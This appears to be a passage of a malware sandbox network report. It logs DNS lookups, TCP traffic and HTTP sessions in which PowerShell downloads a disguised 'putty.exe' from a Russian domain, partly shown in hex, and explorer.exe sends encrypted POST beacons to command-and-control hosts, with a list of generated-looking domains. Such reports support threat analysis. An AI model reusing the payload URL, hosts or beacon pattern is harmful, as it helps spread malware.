                                                                                                                        Dec 19, 2024 07:54:11.229300022 CET4997780192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:11.229355097 CET4997780192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:11.349725008 CET804997794.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:11.350074053 CET804997794.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:12.615632057 CET804997794.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:12.624576092 CET4998180192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:12.675462961 CET4997780192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:12.744086027 CET8049981194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:12.744268894 CET4998180192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:12.745742083 CET4998180192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:12.745769024 CET4998180192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:12.865226984 CET8049981194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:12.865356922 CET8049981194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:14.086338997 CET8049981194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:14.128608942 CET4998180192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:15.138322115 CET4997380192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:15.139177084 CET4998480192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:15.258218050 CET804997394.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:15.258333921 CET4997380192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:15.258676052 CET804998494.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:15.258850098 CET4998480192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:15.258975029 CET4998480192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:15.259001017 CET4998480192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:15.378473997 CET804998494.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:15.378498077 CET804998494.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:17.117568970 CET804998494.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:17.121150017 CET4997780192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:17.125818968 CET4998580192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:17.175721884 CET4998480192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:17.241117001 CET804997794.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:17.241261005 CET4997780192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:17.245433092 CET804998594.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:17.245524883 CET4998580192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:17.307348013 CET4998580192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:17.307385921 CET4998580192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:17.427047014 CET804998594.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:17.427079916 CET804998594.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:18.641432047 CET804998594.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:18.650995016 CET4998180192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:18.651931047 CET4998680192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:18.771301985 CET8049981194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:18.771507978 CET8049986194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:18.771665096 CET4998180192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:18.771703005 CET4998680192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:18.771976948 CET4998680192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:18.772006989 CET4998680192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:18.878602982 CET4998580192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:18.892231941 CET8049986194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:18.892471075 CET8049986194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:20.112735033 CET8049986194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:20.242203951 CET4998680192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:20.841902971 CET4998480192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:20.842659950 CET4998780192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:20.962021112 CET804998494.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:20.962089062 CET4998480192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:20.962133884 CET804998794.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:20.962198973 CET4998780192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:20.962383032 CET4998780192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:20.962409973 CET4998780192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:21.081872940 CET804998794.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:21.081948042 CET804998794.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:22.321511030 CET804998794.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:22.337985039 CET4998580192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:22.346698046 CET4998880192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:22.441086054 CET4998780192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:22.457905054 CET804998594.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:22.458019018 CET4998580192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:22.466593027 CET804998894.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:22.466794014 CET4998880192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:22.466948986 CET4998880192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:22.466948986 CET4998880192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:22.586404085 CET804998894.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:22.586529016 CET804998894.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:23.838357925 CET804998894.156.177.51192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:23.841753960 CET4998680192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:23.842464924 CET4998980192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:23.926064968 CET4998880192.168.2.794.156.177.51
                                                                                                                        Dec 19, 2024 07:54:23.961850882 CET8049986194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:23.961919069 CET8049989194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:23.961925030 CET4998680192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:23.961992979 CET4998980192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:23.962246895 CET4998980192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:23.962266922 CET4998980192.168.2.7194.85.61.76
                                                                                                                        Dec 19, 2024 07:54:24.081764936 CET8049989194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:24.081811905 CET8049989194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:25.302906036 CET8049989194.85.61.76192.168.2.7
                                                                                                                        Dec 19, 2024 07:54:25.441251993 CET4998980192.168.2.7194.85.61.76
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Dec 19, 2024 07:52:12.556016922 CET5075353192.168.2.71.1.1.1
                                                                                                                        Dec 19, 2024 07:52:19.451579094 CET5449653192.168.2.71.1.1.1
                                                                                                                        Dec 19, 2024 07:52:19.969063997 CET53544961.1.1.1192.168.2.7
                                                                                                                        Dec 19, 2024 07:52:46.804567099 CET6047553192.168.2.71.1.1.1
                                                                                                                        Dec 19, 2024 07:52:47.453708887 CET53604751.1.1.1192.168.2.7
                                                                                                                        Dec 19, 2024 07:52:49.016731024 CET4930253192.168.2.71.1.1.1
                                                                                                                        Dec 19, 2024 07:52:49.674704075 CET53493021.1.1.1192.168.2.7
                                                                                                                        Dec 19, 2024 07:52:51.170180082 CET5107753192.168.2.71.1.1.1
                                                                                                                        Dec 19, 2024 07:52:51.975569010 CET53510771.1.1.1192.168.2.7
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Dec 19, 2024 07:52:12.556016922 CET192.168.2.71.1.1.10x420bStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:19.451579094 CET192.168.2.71.1.1.10xd7edStandard query (0)spotcarservice.ruA (IP address)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:46.804567099 CET192.168.2.71.1.1.10x8f81Standard query (0)constractionscity1991.latA (IP address)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:49.016731024 CET192.168.2.71.1.1.10xfca1Standard query (0)restructurisationservice.ruA (IP address)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:51.170180082 CET192.168.2.71.1.1.10x124bStandard query (0)connecticutproperty.ruA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Dec 19, 2024 07:52:11.711920977 CET1.1.1.1192.168.2.70xa8f7No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:11.711920977 CET1.1.1.1192.168.2.70xa8f7No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:12.695540905 CET1.1.1.1192.168.2.70x420bNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:19.969063997 CET1.1.1.1192.168.2.70xd7edNo error (0)spotcarservice.ru94.156.177.51A (IP address)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:47.453708887 CET1.1.1.1192.168.2.70x8f81No error (0)constractionscity1991.lat94.156.177.51A (IP address)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:49.674704075 CET1.1.1.1192.168.2.70xfca1No error (0)restructurisationservice.ru94.156.177.51A (IP address)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:51.975569010 CET1.1.1.1192.168.2.70x124bNo error (0)connecticutproperty.ru194.85.61.76A (IP address)IN (0x0001)false
                                                                                                                        Dec 19, 2024 07:52:51.975569010 CET1.1.1.1192.168.2.70x124bNo error (0)connecticutproperty.ru109.70.26.37A (IP address)IN (0x0001)false
                                                                                                                        • spotcarservice.ru
                                                                                                                        • ejrtkkisotoyx.net
                                                                                                                          • constractionscity1991.lat
                                                                                                                        • rdajeakwfdnw.com
                                                                                                                          • restructurisationservice.ru
                                                                                                                        • hsoudoxnfim.net
                                                                                                                          • connecticutproperty.ru
                                                                                                                        • hrhyeqldvhuev.com
                                                                                                                        • sgsvxfdiyvhaenj.net
                                                                                                                        • esbcbgncmnjrnqow.com
                                                                                                                        • kbqjcqfmijujbph.org
                                                                                                                        • osytirdulvnll.org
                                                                                                                        • lndihcelygbnm.net
                                                                                                                        • almthodjcmij.org
                                                                                                                        • yrebwhkbvdffjj.net
                                                                                                                        • uniikaknxvfyxea.net
                                                                                                                        • cysylnlcrra.org
                                                                                                                        • sqbxkgmkuhr.com
                                                                                                                        • doueaoxbsbt.org
                                                                                                                        • mvghuvrbeajfrwtn.com
                                                                                                                        • qohqjraearkdgi.net
                                                                                                                        • mpxplxtebuujf.org
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.74971794.156.177.51802868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:52:20.098620892 CET94OUTGET /fdjskf88cvt/yumba/putty.exe HTTP/1.1
                                                                                                                        Host: spotcarservice.ru
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Dec 19, 2024 07:52:21.441737890 CET1236INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:52:21 GMT
                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                        Content-Length: 295424
                                                                                                                        Connection: keep-alive
                                                                                                                        Last-Modified: Thu, 19 Dec 2024 06:52:21 GMT
                                                                                                                        ETag: W/"48200-62999fe73c900"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 cf c2 6a d7 ae ac 39 d7 ae ac 39 d7 ae ac 39 c9 fc 39 39 cd ae ac 39 c9 fc 2f 39 51 ae ac 39 c9 fc 28 39 fd ae ac 39 f0 68 d7 39 d4 ae ac 39 d7 ae ad 39 ac ae ac 39 c9 fc 26 39 d6 ae ac 39 c9 fc 38 39 d6 ae ac 39 c9 fc 3d 39 d6 ae ac 39 52 69 63 68 d7 ae ac 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 77 c4 9b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e4 03 00 00 04 01 00 00 00 00 00 a2 49 00 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 04 00 00 04 00 00 ba f9 04 00 02 00 00 81 00 00 [TRUNCATED]
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$j999999/9Q9(99h9999&99899=99Rich9PELwdI@((9P.@.text `.data`@.rsrc9:H@@
                                                                                                                        Dec 19, 2024 07:52:21.441773891 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc eb 03 00 f0 eb 03 00 08 ec 03 00 20 ec 03 00 34 ec 03 00 52 ec 03 00 68 ec 03 00 7c ec 03 00 96
                                                                                                                        Data Ascii: 4Rh| <Pjz2@N^r$BV
                                                                                                                        Dec 19, 2024 07:52:21.441977978 CET1236INData Raw: 00 62 ef 03 00 6e ef 03 00 84 ef 03 00 90 ef 03 00 a8 ef 03 00 c0 ef 03 00 d2 ef 03 00 e2 ef 03 00 f0 ef 03 00 02 f0 03 00 1a f0 03 00 2c f0 03 00 3a f0 03 00 42 f0 03 00 50 f0 03 00 5c f0 03 00 72 f0 03 00 88 f0 03 00 a2 f0 03 00 bc f0 03 00 ce
                                                                                                                        Data Ascii: bn,:BP\r$2L\r:J\pk@n@d
                                                                                                                        Dec 19, 2024 07:52:21.442038059 CET1236INData Raw: 69 6f 6e 0a 54 68 69 73 20 69 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 20 49 74 20 69 73 20 6d 6f 73 74 20 6c 69 6b 65 6c 79 20 74 68 65 20 72 65 73 75 6c 74 20 6f 66 20 63 61 6c 6c
                                                                                                                        Data Ascii: ionThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.R6032- not enough space for locale informationR6031- Attempt to in
                                                                                                                        Dec 19, 2024 07:52:21.442054987 CET1236INData Raw: 00 90 00 00 c0 08 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 45 6e 63 6f 64 65 50 6f 69 6e 74 65 72 00 00 00 4b 00 45 00 52 00 4e 00 45 00 4c 00 33
                                                                                                                        Data Ascii: EncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAlloccsm @*@*@ !"#$%&'()*
                                                                                                                        Dec 19, 2024 07:52:21.442178011 CET1236INData Raw: 74 75 72 6e 69 6e 67 27 00 60 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 63 6c 6f 73 75 72 65 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 65 68 20 76
                                                                                                                        Data Ascii: turning'`copy constructor closure'`eh vector vbase constructor iterator'`eh vector destructor iterator'`eh vector constructor iterator'`virtual displacement map'`vector vbase constructor iterator'`vector destructor iterator'`v
                                                                                                                        Dec 19, 2024 07:52:21.442194939 CET1236INData Raw: 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 c8 67 44 00 20 68 44 00 65 2b 30 30 30 00 00 00 00 00 00 c0 7e 01 50 41 00 00 00 80 ff ff 47 41 49 73 50 72 6f 63 65 73 73 6f 72 46 65 61 74 75 72 65 50 72 65 73 65 6e 74 00 00 00 4b 45 52 4e 45
                                                                                                                        Data Ascii: BoxAUSER32.DLLgD hDe+000~PAGAIsProcessorFeaturePresentKERNEL32
                                                                                                                        Dec 19, 2024 07:52:21.442210913 CET1236INData Raw: 00 14 00 10 00 10 00 10 00 10 00 10 00 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 02 01 02
                                                                                                                        Data Ascii:
                                                                                                                        Dec 19, 2024 07:52:21.442226887 CET1236INData Raw: 61 74 00 00 00 4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a 75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f 76 44 65 63 00 00 00 00 43 4f 4e 4f 55 54 24 00 31 23 51 4e 41 4e 00 00 31 23 49 4e 46 00 00 00 31 23 49 4e 44 00 00 00 31 23 53 4e 41
                                                                                                                        Data Ascii: atJanFebMarAprMayJunJulAugSepOctNovDecCONOUT$1#QNAN1#INF1#IND1#SNANbad allocationkernel32.dllkernel32.dll00/@p0@/<@H
                                                                                                                        Dec 19, 2024 07:52:21.442370892 CET1236INData Raw: 34 10 40 00 6a 00 6a 00 6a 00 ff 15 5c 10 40 00 6a 00 6a 00 6a 00 ff 15 80 10 40 00 8d 85 94 f6 ff ff 50 6a 00 6a 00 6a 00 ff 15 60 10 40 00 8d 4d d0 51 6a 00 6a 00 6a 00 ff 15 14 10 40 00 8d 95 34 ff ff ff 52 ff 15 84 10 40 00 8d 45 d4 50 ff 15
                                                                                                                        Data Ascii: 4@jjj\@jjj@Pjjj`@MQjjj@4R@EP@+]=4DuMQjjj,@j|@UEEEM33MGa+m}EE8_^X[]QhkDUUdjhCPd%(
                                                                                                                        Dec 19, 2024 07:52:21.561578989 CET1236INData Raw: b0 65 5e c7 85 74 ff ff ff 67 de 02 27 c7 45 f8 81 36 fa 53 c7 45 d0 29 16 78 1d c7 45 e0 48 44 35 35 c7 45 e4 c1 5b a5 2a c7 45 e8 e6 8f 4b 22 c7 45 80 1e d0 50 18 c7 45 d8 40 71 68 6e c7 45 a0 80 ce b2 45 c7 45 84 98 0c b3 49 c7 45 fc 95 97 69
                                                                                                                        Data Ascii: e^tg'E6SE)xEHD55E[*EK"EPE@qhnEEEIEi|EK?EIEdoe|0E"pxE8'E^EMGEFGEcE8EE>>E*eExxLeEmPE]~eE


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.74978394.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:52:47.574831963 CET283OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://ejrtkkisotoyx.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 315
                                                                                                                        Host: constractionscity1991.lat
                                                                                                                        Dec 19, 2024 07:52:47.574831963 CET315OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 82 23 7b b1
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)#{Qp$Q0@FY}LqLEY$fIKE-}Zsx%)nRZw[wz{d?bPX*gcn.8|E<i`KP&j?-}}!qi`WzZ
                                                                                                                        Dec 19, 2024 07:52:49.012190104 CET595INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:52:48 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.74978994.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:52:49.798181057 CET284OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://rdajeakwfdnw.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 201
                                                                                                                        Host: restructurisationservice.ru
                                                                                                                        Dec 19, 2024 07:52:49.798206091 CET201OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 8c 5d 71 d2
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)]qMJCDFhY48=6G$<lM/C{GW\KpG5fYr}Mz8#t({-JnR6eQd0
                                                                                                                        Dec 19, 2024 07:52:51.164516926 CET597INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:52:50 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.749795194.85.61.76804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:52:52.097479105 CET278OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://hsoudoxnfim.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 203
                                                                                                                        Host: connecticutproperty.ru
                                                                                                                        Dec 19, 2024 07:52:52.097497940 CET203OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e7 33 31 da
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)31w>]]2E]\iq$2GuGIg+T4V^B|.gVKHi($XHfX.,OA9
                                                                                                                        Dec 19, 2024 07:52:53.443018913 CET300INHTTP/1.1 405 Not Allowed
                                                                                                                        Server: nginx
